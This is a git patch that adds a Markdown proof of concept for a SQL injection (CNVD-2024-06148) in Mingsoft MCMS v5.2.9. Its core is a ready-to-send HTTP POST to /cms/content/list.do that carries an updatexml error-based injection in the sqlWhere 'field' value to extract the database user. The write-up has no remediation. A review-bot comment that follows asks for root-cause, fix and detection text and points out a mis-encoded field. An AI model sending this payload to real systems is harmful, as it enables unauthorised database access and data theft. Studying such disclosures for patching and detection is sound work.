From 9972417a9ad1ac2147a6f721d74ca48461c4a965 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 30 Apr 2024 12:29:46 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=20Mingsoft-MCMS=E5=89=8D=E5=8F=B0?= =?UTF-8?q?=E6=9F=A5=E8=AF=A2=E6=96=87=E7=AB=A0=E5=88=97=E8=A1=A8=E6=8E=A5?= =?UTF-8?q?=E5=8F=A3SQL=E6=B3=A8=E5=85=A5(CNVD-2024-06148).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...查询文章列表接口SQL注入(CNVD-2024-06148).md | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
create mode 100644 Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md
diff --git a/Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md b/Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md
new file mode 100644
index 0000000..d68b624
--- /dev/null
+++ b/Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md
@@ -0,0 +1,19 @@
+ ## Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148)
+
+## 版本
+```
+ v5.2.9
+```
+
+## poc
+```
+POST /cms/content/list.do HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+Connection: close
+Content-Length: 326
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate, br
+
+categoryType=1&sqlWhere=%5b%7b%22action%22%3a%22and%22%2c%22field%22%3a%22updatexml(1%2cconcat(0x7e%2c(SELECT%20%20current_user)%2c0x7e)%2c1)%22%2c%22el%22%3a%22eq%22%2c%22model%22%3a%22contentTitle%22%2c%22name%22%3a%22æç« æ é¢%22%2c%22type%22%3a%22input%22%2c%22value%22%3a%22111%22%7d%5d&pageNo=1&pageSize=10
+```
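Review bot: The new write-up ends at the raw request and gives a defender nothing on root cause, detection or remediation, so a short section after the `poc` block is needed. In the request the SQL expression sits in the `field` member of the JSON passed in `sqlWhere` to `/cms/content/list.do`, which suggests (inferred from the request only, not from server code) that the value is used as a column name without validation; the section should say so and state the fix direction, e.g. `修复建议: validate sqlWhere[].field against an allow-list of known column names; never concatenate it into the query`. A detection line also belongs there, such as `检测: alert on POSTs to /cms/content/list.do whose sqlWhere "field" value contains "(" or SQL function names`. The `版本` block lists only `v5.2.9`; state whether other releases are affected and which release fixes the issue, or mark both as unknown. Separately, the `name` value in the body is mis-encoded (`æç« æ é¢`) and should be restored as UTF-8 text.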